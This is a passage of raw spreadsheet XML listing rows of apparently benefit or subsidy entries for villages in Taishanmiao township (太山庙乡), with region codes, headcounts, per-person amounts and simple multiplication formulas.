      </c>
      <c r="E2245" s="17" t="s">
        <v>5900</v>
      </c>
      <c r="F2245" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2245" s="17">
        <v>1</v>
      </c>
      <c r="H2245" s="18">
        <v>365</v>
      </c>
      <c r="I2245" s="17">
        <f t="shared" si="107"/>
        <v>365</v>
      </c>
      <c r="J2245" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2245" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2246" customHeight="1" spans="1:11">
      <c r="A2246" s="16" t="s">
        <v>5901</v>
      </c>
      <c r="B2246" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2246" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2246" s="17" t="s">
        <v>5902</v>
      </c>
      <c r="E2246" s="17" t="s">
        <v>5525</v>
      </c>
      <c r="F2246" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2246" s="17">
        <v>1</v>
      </c>
      <c r="H2246" s="18">
        <v>365</v>
      </c>
      <c r="I2246" s="17">
        <f t="shared" si="107"/>
        <v>365</v>
      </c>
      <c r="J2246" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2246" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2247" customHeight="1" spans="1:11">
      <c r="A2247" s="16" t="s">
        <v>5903</v>
      </c>
      <c r="B2247" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2247" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2247" s="17" t="s">
        <v>5904</v>
      </c>
      <c r="E2247" s="17" t="s">
        <v>5905</v>
      </c>
      <c r="F2247" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2247" s="17">
        <v>2</v>
      </c>
      <c r="H2247" s="18">
        <v>325</v>
      </c>
      <c r="I2247" s="17">
        <f t="shared" si="107"/>
        <v>650</v>
      </c>
      <c r="J2247" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2247" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2248" customHeight="1" spans="1:11">
      <c r="A2248" s="16" t="s">
        <v>5906</v>
      </c>
      <c r="B2248" s="17" t="str">
        <f>B2247</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2248" s="17" t="str">
        <f>C2247</f>
        <v>毛庄村</v>
      </c>
      <c r="D2248" s="16" t="s">
        <v>5907</v>
      </c>
      <c r="E2248" s="17" t="s">
        <v>5446</v>
      </c>
      <c r="F2248" s="17">
        <f>F2247</f>
        <v>4113210704</v>
      </c>
      <c r="G2248" s="17"/>
      <c r="H2248" s="17"/>
      <c r="I2248" s="17"/>
      <c r="J2248" s="17"/>
      <c r="K2248" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2249" customHeight="1" spans="1:11">
      <c r="A2249" s="16" t="s">
        <v>5908</v>
      </c>
      <c r="B2249" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2249" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2249" s="17" t="s">
        <v>5909</v>
      </c>
      <c r="E2249" s="17" t="s">
        <v>5484</v>
      </c>
      <c r="F2249" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2249" s="17">
        <v>1</v>
      </c>
      <c r="H2249" s="18">
        <v>365</v>
      </c>
      <c r="I2249" s="17">
        <f>H2249*G2249</f>
        <v>365</v>
      </c>
      <c r="J2249" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2249" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2250" customHeight="1" spans="1:11">
      <c r="A2250" s="16" t="s">
        <v>5910</v>
      </c>
      <c r="B2250" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2250" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2250" s="17" t="s">
        <v>5911</v>
      </c>
      <c r="E2250" s="17" t="s">
        <v>3527</v>
      </c>
      <c r="F2250" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2250" s="17">
        <v>1</v>
      </c>
      <c r="H2250" s="18">
        <v>365</v>
      </c>
      <c r="I2250" s="17">
        <f>H2250*G2250</f>
        <v>365</v>
      </c>
      <c r="J2250" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2250" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2251" customHeight="1" spans="1:11">
      <c r="A2251" s="16" t="s">
        <v>5912</v>
      </c>
      <c r="B2251" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2251" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2251" s="17" t="s">
        <v>5913</v>
      </c>
      <c r="E2251" s="17" t="s">
        <v>2235</v>
      </c>
      <c r="F2251" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2251" s="17">
        <v>1</v>
      </c>
      <c r="H2251" s="18">
        <v>365</v>
      </c>
      <c r="I2251" s="17">
        <f>H2251*G2251</f>
        <v>365</v>
      </c>
      <c r="J2251" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2251" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2252" customHeight="1" spans="1:11">
      <c r="A2252" s="16" t="s">
        <v>5914</v>
      </c>
      <c r="B2252" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2252" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2252" s="17" t="s">
        <v>5915</v>
      </c>
      <c r="E2252" s="17" t="s">
        <v>5550</v>
      </c>
      <c r="F2252" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2252" s="17">
        <v>1</v>
      </c>
      <c r="H2252" s="18">
        <v>365</v>
      </c>
      <c r="I2252" s="17">
        <f>H2252*G2252</f>
        <v>365</v>
      </c>
      <c r="J2252" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2252" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2253" customHeight="1" spans="1:11">
      <c r="A2253" s="16" t="s">
        <v>5916</v>
      </c>
      <c r="B2253" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2253" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2253" s="17" t="s">
        <v>5917</v>
      </c>
      <c r="E2253" s="17" t="s">
        <v>5431</v>
      </c>
      <c r="F2253" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2253" s="17">
        <v>1</v>
      </c>
      <c r="H2253" s="18">
        <v>365</v>
      </c>
      <c r="I2253" s="17">
        <f>H2253*G2253</f>
        <v>365</v>
      </c>
      <c r="J2253" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2253" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2254" customHeight="1" spans="1:11">
      <c r="A2254" s="16" t="s">
        <v>5918</v>
      </c>
      <c r="B2254" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2254" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2254" s="17" t="s">
        <v>5919</v>
      </c>
      <c r="E2254" s="17" t="s">
        <v>5635</v>
      </c>
      <c r="F2254" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2254" s="17">
        <v>1</v>
      </c>
      <c r="H2254" s="18">
        <v>365</v>
      </c>
      <c r="I2254" s="17">
        <f t="shared" ref="I2254:I2259" si="108">H2254*G2254</f>
        <v>365</v>
      </c>
      <c r="J2254" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2254" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2255" customHeight="1" spans="1:11">
      <c r="A2255" s="16" t="s">
        <v>5920</v>
      </c>
      <c r="B2255" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2255" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2255" s="17" t="s">
        <v>5921</v>
      </c>
      <c r="E2255" s="17" t="s">
        <v>5699</v>
      </c>
      <c r="F2255" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2255" s="17">
        <v>1</v>
      </c>
      <c r="H2255" s="18">
        <v>365</v>
      </c>
      <c r="I2255" s="17">
        <f t="shared" si="108"/>
        <v>365</v>
      </c>
      <c r="J2255" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2255" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2256" customHeight="1" spans="1:11">
      <c r="A2256" s="16" t="s">
        <v>5922</v>
      </c>
      <c r="B2256" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2256" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2256" s="17" t="s">
        <v>5923</v>
      </c>
      <c r="E2256" s="17" t="s">
        <v>5560</v>
      </c>
      <c r="F2256" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2256" s="17">
        <v>1</v>
      </c>
      <c r="H2256" s="18">
        <v>365</v>
      </c>
      <c r="I2256" s="17">
        <f t="shared" si="108"/>
        <v>365</v>
      </c>
      <c r="J2256" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2256" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2257" customHeight="1" spans="1:11">
      <c r="A2257" s="16" t="s">
        <v>5924</v>
      </c>
      <c r="B2257" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2257" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2257" s="17" t="s">
        <v>5925</v>
      </c>
      <c r="E2257" s="17" t="s">
        <v>5519</v>
      </c>
      <c r="F2257" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2257" s="17">
        <v>1</v>
      </c>
      <c r="H2257" s="18">
        <v>365</v>
      </c>
      <c r="I2257" s="17">
        <f t="shared" si="108"/>
        <v>365</v>
      </c>
      <c r="J2257" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2257" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2258" customHeight="1" spans="1:11">
      <c r="A2258" s="16" t="s">
        <v>5926</v>
      </c>
      <c r="B2258" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2258" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2258" s="17" t="s">
        <v>5927</v>
      </c>
      <c r="E2258" s="17" t="s">
        <v>5900</v>
      </c>
      <c r="F2258" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2258" s="17">
        <v>1</v>
      </c>
      <c r="H2258" s="18">
        <v>365</v>
      </c>
      <c r="I2258" s="17">
        <f t="shared" si="108"/>
        <v>365</v>
      </c>
      <c r="J2258" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2258" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2259" customHeight="1" spans="1:11">
      <c r="A2259" s="16" t="s">
        <v>5928</v>
      </c>
      <c r="B2259" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2259" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2259" s="17" t="s">
        <v>5929</v>
      </c>
      <c r="E2259" s="17" t="s">
        <v>5930</v>
      </c>
      <c r="F2259" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2259" s="17">
        <v>1</v>
      </c>
      <c r="H2259" s="18">
        <v>365</v>
      </c>
      <c r="I2259" s="17">
        <f t="shared" si="108"/>
        <v>365</v>
      </c>
      <c r="J2259" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2259" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2260" customHeight="1" spans="1:11">
      <c r="A2260" s="16" t="s">
        <v>5931</v>
      </c>
      <c r="B2260" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2260" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2260" s="17" t="s">
        <v>5932</v>
      </c>
      <c r="E2260" s="17" t="s">
        <v>5933</v>
      </c>
      <c r="F2260" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2260" s="17">
        <v>1</v>
      </c>
      <c r="H2260" s="18">
        <v>365</v>
      </c>
      <c r="I2260" s="17">
        <f t="shared" ref="I2260:I2268" si="109">H2260*G2260</f>
        <v>365</v>
      </c>
      <c r="J2260" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2260" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2261" customHeight="1" spans="1:11">
      <c r="A2261" s="16" t="s">
        <v>5934</v>
      </c>
      <c r="B2261" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2261" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="D2261" s="17" t="s">
        <v>5935</v>
      </c>
      <c r="E2261" s="17" t="s">
        <v>5936</v>
      </c>
      <c r="F2261" s="17" t="s">
        <v>5653</v>
      </c>
      <c r="G2261" s="17">
        <v>1</v>
      </c>
      <c r="H2261" s="18">
        <v>365</v>
      </c>
      <c r="I2261" s="17">
        <f t="shared" si="109"/>
        <v>365</v>
      </c>
      <c r="J2261" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2261" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2262" customHeight="1" spans="1:11">
      <c r="A2262" s="16" t="s">
        <v>5937</v>
      </c>
      <c r="B2262" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2262" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2262" s="17" t="s">
        <v>5938</v>
      </c>
      <c r="E2262" s="17" t="s">
        <v>5939</v>
      </c>
      <c r="F2262" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2262" s="17">
        <v>1</v>
      </c>
      <c r="H2262" s="18">
        <v>365</v>
      </c>
      <c r="I2262" s="17">
        <f t="shared" si="109"/>
        <v>365</v>
      </c>
      <c r="J2262" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2262" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2263" customHeight="1" spans="1:11">
      <c r="A2263" s="16" t="s">
        <v>5940</v>
      </c>
      <c r="B2263" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2263" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="D2263" s="17" t="s">
        <v>5941</v>
      </c>
      <c r="E2263" s="17" t="s">
        <v>5449</v>
      </c>
      <c r="F2263" s="17" t="s">
        <v>5942</v>
      </c>
      <c r="G2263" s="17">
        <v>1</v>
      </c>
      <c r="H2263" s="18">
        <v>365</v>
      </c>
      <c r="I2263" s="17">
        <f t="shared" si="109"/>
        <v>365</v>
      </c>
      <c r="J2263" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2263" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2264" customHeight="1" spans="1:11">
      <c r="A2264" s="16" t="s">
        <v>5943</v>
      </c>
      <c r="B2264" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2264" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2264" s="17" t="s">
        <v>5944</v>
      </c>
      <c r="E2264" s="17" t="s">
        <v>3486</v>
      </c>
      <c r="F2264" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2264" s="17">
        <v>2</v>
      </c>
      <c r="H2264" s="18">
        <v>325</v>
      </c>
      <c r="I2264" s="17">
        <f t="shared" si="109"/>
        <v>650</v>
      </c>
      <c r="J2264" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2264" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2265" customHeight="1" spans="1:11">
      <c r="A2265" s="16" t="s">
        <v>5945</v>
      </c>
      <c r="B2265" s="17" t="str">
        <f>B2264</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2265" s="17" t="str">
        <f>C2264</f>
        <v>毛庄村</v>
      </c>
      <c r="D2265" s="23" t="s">
        <v>5946</v>
      </c>
      <c r="E2265" s="23" t="s">
        <v>5947</v>
      </c>
      <c r="F2265" s="17">
        <f>F2264</f>
        <v>4113210704</v>
      </c>
      <c r="G2265" s="17"/>
      <c r="H2265" s="17"/>
      <c r="I2265" s="17"/>
      <c r="J2265" s="17"/>
      <c r="K2265" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2266" customHeight="1" spans="1:11">
      <c r="A2266" s="16" t="s">
        <v>5948</v>
      </c>
      <c r="B2266" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2266" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2266" s="17" t="s">
        <v>5949</v>
      </c>
      <c r="E2266" s="17" t="s">
        <v>5431</v>
      </c>
      <c r="F2266" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2266" s="17">
        <v>1</v>
      </c>
      <c r="H2266" s="18">
        <v>365</v>
      </c>
      <c r="I2266" s="17">
        <f t="shared" ref="I2266:I2273" si="110">H2266*G2266</f>
        <v>365</v>
      </c>
      <c r="J2266" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2266" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2267" customHeight="1" spans="1:11">
      <c r="A2267" s="16" t="s">
        <v>5950</v>
      </c>
      <c r="B2267" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2267" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="D2267" s="17" t="s">
        <v>5951</v>
      </c>
      <c r="E2267" s="17" t="s">
        <v>5952</v>
      </c>
      <c r="F2267" s="17" t="s">
        <v>5953</v>
      </c>
      <c r="G2267" s="17">
        <v>1</v>
      </c>
      <c r="H2267" s="18">
        <v>365</v>
      </c>
      <c r="I2267" s="17">
        <f t="shared" si="110"/>
        <v>365</v>
      </c>
      <c r="J2267" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2267" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2268" customHeight="1" spans="1:11">
      <c r="A2268" s="16" t="s">
        <v>5954</v>
      </c>
      <c r="B2268" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2268" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2268" s="17" t="s">
        <v>5955</v>
      </c>
      <c r="E2268" s="17" t="s">
        <v>5443</v>
      </c>
      <c r="F2268" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2268" s="17">
        <v>1</v>
      </c>
      <c r="H2268" s="18">
        <v>365</v>
      </c>
      <c r="I2268" s="17">
        <f t="shared" si="110"/>
        <v>365</v>
      </c>
      <c r="J2268" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2268" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2269" customHeight="1" spans="1:11">
      <c r="A2269" s="16" t="s">
        <v>5956</v>
      </c>
      <c r="B2269" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2269" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="D2269" s="17" t="s">
        <v>5957</v>
      </c>
      <c r="E2269" s="17" t="s">
        <v>5042</v>
      </c>
      <c r="F2269" s="17">
        <v>4113210712</v>
      </c>
      <c r="G2269" s="17">
        <v>1</v>
      </c>
      <c r="H2269" s="18">
        <v>365</v>
      </c>
      <c r="I2269" s="17">
        <f t="shared" si="110"/>
        <v>365</v>
      </c>
      <c r="J2269" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2269" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2270" customHeight="1" spans="1:11">
      <c r="A2270" s="16" t="s">
        <v>5958</v>
      </c>
      <c r="B2270" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2270" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="D2270" s="17" t="s">
        <v>5959</v>
      </c>
      <c r="E2270" s="17" t="s">
        <v>5960</v>
      </c>
      <c r="F2270" s="17">
        <v>4113210714</v>
      </c>
      <c r="G2270" s="17">
        <v>1</v>
      </c>
      <c r="H2270" s="18">
        <v>365</v>
      </c>
      <c r="I2270" s="17">
        <f t="shared" si="110"/>
        <v>365</v>
      </c>
      <c r="J2270" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2270" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2271" customHeight="1" spans="1:11">
      <c r="A2271" s="16" t="s">
        <v>5961</v>
      </c>
      <c r="B2271" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2271" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2271" s="17" t="s">
        <v>5962</v>
      </c>
      <c r="E2271" s="17" t="s">
        <v>5569</v>
      </c>
      <c r="F2271" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2271" s="17">
        <v>1</v>
      </c>
      <c r="H2271" s="18">
        <v>365</v>
      </c>
      <c r="I2271" s="17">
        <f t="shared" si="110"/>
        <v>365</v>
      </c>
      <c r="J2271" s="17" t="s">
        <v>5963</v>
      </c>
      <c r="K2271" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2272" customHeight="1" spans="1:11">
      <c r="A2272" s="16" t="s">
        <v>5964</v>
      </c>
      <c r="B2272" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2272" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2272" s="17" t="s">
        <v>5965</v>
      </c>
      <c r="E2272" s="17" t="s">
        <v>5457</v>
      </c>
      <c r="F2272" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2272" s="17">
        <v>1</v>
      </c>
      <c r="H2272" s="18">
        <v>365</v>
      </c>
      <c r="I2272" s="17">
        <f t="shared" si="110"/>
        <v>365</v>
      </c>
      <c r="J2272" s="17" t="s">
        <v>5966</v>
      </c>
      <c r="K2272" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2273" customHeight="1" spans="1:11">
      <c r="A2273" s="16" t="s">
        <v>5967</v>
      </c>
      <c r="B2273" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2273" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="D2273" s="17" t="s">
        <v>5968</v>
      </c>
      <c r="E2273" s="17" t="s">
        <v>5436</v>
      </c>
      <c r="F2273" s="17" t="s">
        <v>5653</v>
      </c>
      <c r="G2273" s="17">
        <v>2</v>
      </c>
      <c r="H2273" s="18">
        <v>340</v>
      </c>
      <c r="I2273" s="17">
        <f t="shared" si="110"/>
        <v>680</v>
      </c>
      <c r="J2273" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2273" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2274" customHeight="1" spans="1:11">
      <c r="A2274" s="16" t="s">
        <v>5969</v>
      </c>
      <c r="B2274" s="17" t="str">
        <f>B2273</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2274" s="17" t="str">
        <f>C2273</f>
        <v>太山庙乡</v>
      </c>
      <c r="D2274" s="16" t="s">
        <v>5970</v>
      </c>
      <c r="E2274" s="17" t="s">
        <v>3459</v>
      </c>
      <c r="F2274" s="17" t="str">
        <f>F2273</f>
        <v>4113210705</v>
      </c>
      <c r="G2274" s="17"/>
      <c r="H2274" s="17"/>
      <c r="I2274" s="17"/>
      <c r="J2274" s="17"/>
      <c r="K2274" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2275" customHeight="1" spans="1:11">
      <c r="A2275" s="16" t="s">
        <v>5971</v>
      </c>
      <c r="B2275" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2275" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="D2275" s="17" t="s">
        <v>5972</v>
      </c>
      <c r="E2275" s="17" t="s">
        <v>5973</v>
      </c>
      <c r="F2275" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2275" s="17">
        <v>1</v>
      </c>
      <c r="H2275" s="17">
        <v>500</v>
      </c>
      <c r="I2275" s="17">
        <f>H2275*G2275</f>
        <v>500</v>
      </c>
      <c r="J2275" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2275" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2276" customHeight="1" spans="1:11">
      <c r="A2276" s="16" t="s">
        <v>5974</v>
      </c>
      <c r="B2276" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2276" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2276" s="17" t="s">
        <v>5975</v>
      </c>
      <c r="E2276" s="17" t="s">
        <v>5716</v>
      </c>
      <c r="F2276" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2276" s="17">
        <v>2</v>
      </c>
      <c r="H2276" s="18">
        <v>325</v>
      </c>
      <c r="I2276" s="17">
        <f>H2276*G2276</f>
        <v>650</v>
      </c>
      <c r="J2276" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2276" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2277" customHeight="1" spans="1:11">
      <c r="A2277" s="16" t="s">
        <v>5976</v>
      </c>
      <c r="B2277" s="17" t="str">
        <f>B2276</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2277" s="17" t="str">
        <f>C2276</f>
        <v>毛庄村</v>
      </c>
      <c r="D2277" s="46" t="s">
        <v>1105</v>
      </c>
      <c r="E2277" s="47" t="s">
        <v>5499</v>
      </c>
      <c r="F2277" s="17">
        <f>F2276</f>
        <v>4113210704</v>
      </c>
      <c r="G2277" s="17"/>
      <c r="H2277" s="17"/>
      <c r="I2277" s="17"/>
      <c r="J2277" s="29"/>
      <c r="K2277" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2278" customHeight="1" spans="1:11">
      <c r="A2278" s="16" t="s">
        <v>5977</v>
      </c>
      <c r="B2278" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2278" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2278" s="17" t="s">
        <v>5978</v>
      </c>
      <c r="E2278" s="17" t="s">
        <v>5979</v>
      </c>
      <c r="F2278" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2278" s="17">
        <v>1</v>
      </c>
      <c r="H2278" s="18">
        <v>365</v>
      </c>
      <c r="I2278" s="17">
        <f>H2278*G2278</f>
        <v>365</v>
      </c>
      <c r="J2278" s="29">
        <v>45536</v>
      </c>
      <c r="K2278" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2279" customHeight="1" spans="1:11">
      <c r="A2279" s="16" t="s">
        <v>5980</v>
      </c>
      <c r="B2279" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2279" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2279" s="17" t="s">
        <v>5981</v>
      </c>
      <c r="E2279" s="17" t="s">
        <v>5864</v>
      </c>
      <c r="F2279" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2279" s="17">
        <v>1</v>
      </c>
      <c r="H2279" s="18">
        <v>365</v>
      </c>
      <c r="I2279" s="17">
        <f>H2279*G2279</f>
        <v>365</v>
      </c>
      <c r="J2279" s="17">
        <v>45139</v>
      </c>
      <c r="K2279" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2280" customHeight="1" spans="1:11">
      <c r="A2280" s="16" t="s">
        <v>5982</v>
      </c>
      <c r="B2280" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2280" s="17" t="s">
        <v>5983</v>
      </c>
      <c r="D2280" s="17" t="s">
        <v>5984</v>
      </c>
      <c r="E2280" s="17" t="s">
        <v>3265</v>
      </c>
      <c r="F2280" s="17" t="s">
        <v>5942</v>
      </c>
      <c r="G2280" s="17">
        <v>2</v>
      </c>
      <c r="H2280" s="18">
        <v>325</v>
      </c>
      <c r="I2280" s="17">
        <f>H2280*G2280</f>
        <v>650</v>
      </c>
      <c r="J2280" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2280" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2281" customHeight="1" spans="1:11">
      <c r="A2281" s="16" t="s">
        <v>5985</v>
      </c>
      <c r="B2281" s="17" t="str">
        <f>B2280</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2281" s="17" t="str">
        <f>C2280</f>
        <v>长江厂</v>
      </c>
      <c r="D2281" s="79" t="s">
        <v>5986</v>
      </c>
      <c r="E2281" s="79" t="s">
        <v>5987</v>
      </c>
      <c r="F2281" s="17" t="str">
        <f>F2280</f>
        <v>4113210712</v>
      </c>
      <c r="G2281" s="17"/>
      <c r="H2281" s="17"/>
      <c r="I2281" s="17"/>
      <c r="J2281" s="17"/>
      <c r="K2281" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2282" customHeight="1" spans="1:11">
      <c r="A2282" s="16" t="s">
        <v>5988</v>
      </c>
      <c r="B2282" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2282" s="17" t="s">
        <v>5983</v>
      </c>
      <c r="D2282" s="17" t="s">
        <v>5989</v>
      </c>
      <c r="E2282" s="17" t="s">
        <v>5460</v>
      </c>
      <c r="F2282" s="17" t="s">
        <v>5942</v>
      </c>
      <c r="G2282" s="17">
        <v>3</v>
      </c>
      <c r="H2282" s="18">
        <v>320</v>
      </c>
      <c r="I2282" s="17">
        <f>H2282*G2282</f>
        <v>960</v>
      </c>
      <c r="J2282" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2282" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2283" customHeight="1" spans="1:11">
      <c r="A2283" s="16" t="s">
        <v>5990</v>
      </c>
      <c r="B2283" s="17" t="str">
        <f>B2282</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2283" s="17" t="str">
        <f>C2282</f>
        <v>长江厂</v>
      </c>
      <c r="D2283" s="79" t="s">
        <v>5991</v>
      </c>
      <c r="E2283" s="23" t="s">
        <v>3358</v>
      </c>
      <c r="F2283" s="17" t="str">
        <f>F2282</f>
        <v>4113210712</v>
      </c>
      <c r="G2283" s="17"/>
      <c r="H2283" s="17"/>
      <c r="I2283" s="17"/>
      <c r="J2283" s="17"/>
      <c r="K2283" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2284" customHeight="1" spans="1:11">
      <c r="A2284" s="16" t="s">
        <v>5992</v>
      </c>
      <c r="B2284" s="17" t="str">
        <f>B2283</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2284" s="17" t="str">
        <f>C2283</f>
